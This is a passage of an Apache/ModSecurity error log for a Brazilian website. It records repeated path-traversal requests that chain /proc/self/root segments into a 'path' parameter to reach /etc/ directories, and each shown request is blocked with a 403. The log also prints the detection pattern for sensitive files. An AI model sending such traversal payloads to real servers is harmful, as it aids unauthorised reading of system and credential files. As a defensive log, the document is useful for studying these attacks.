"abmOtKt8Nd0UC_OcbVHMQQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:28.125790 2026] [proxy_fcgi:error] [pid 28879:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:26:29.355037 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.241.31:45918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOxa4xEDsg_V3ESNZNxQAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:30.818597 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.241.31:45924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOxvPqhzTj3BvfDX-JVwAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:34.200454 2026] [:error] [pid 7004:tid 140411641214720] [client 74.7.241.31:45934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOysU6Sx0TG1YjmQiwJAAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:37.431136 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:46228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOzfPqhzTj3BvfDX-JWgAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:38.887468 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:46234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOzsU6Sx0TG1YjmQiwJQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:40.324115 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:46240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO0NY0UrI5A3LftIz9bAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:41.676841 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.31:46244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO0QeiSKl8TjouI-Ya_AAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:42.951512 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:46254] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO0tY0UrI5A3LftIz9bwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:44.395005 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:46270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO1NY0UrI5A3LftIz9dQAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:45.897182 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.241.31:46284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO1at8Nd0UC_OcbVHMSAAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:47.342062 2026] [:error] [pid 9299:tid 140411574073088] [client 74.7.241.31:57948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO17-sgTmmJoPuMdy3rAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:48.123592 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.31:57948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO2L-sgTmmJoPuMdy3rwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:50.007938 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.241.31:57950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO2r-sgTmmJoPuMdy3sQAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:50.045877 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:26:51.442552 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.241.31:57952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO264xEDsg_V3ESNZN0QAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:53.150825 2026] [:error] [pid 29151:tid 140411658000128] [client 74.7.241.31:57960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO3fPqhzTj3BvfDX-JXwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:54.617819 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:57970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO3tY0UrI5A3LftIz9eQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:56.015416 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.241.31:57976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO4Bj0p0SRWAqcjGF68gAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:26:57.497936 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:34586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO4XIk7brgkOH-rIWNNgAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:27:11.129768 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34460] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:27:13.239812 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.31:55154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO8QeiSKl8TjouI-YbCQAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:27:14.643818 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:55170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO8geiSKl8TjouI-YbDAAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:27:16.079363 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.241.31:55172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmO9Kt8Nd0UC_OcbVHMWQAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
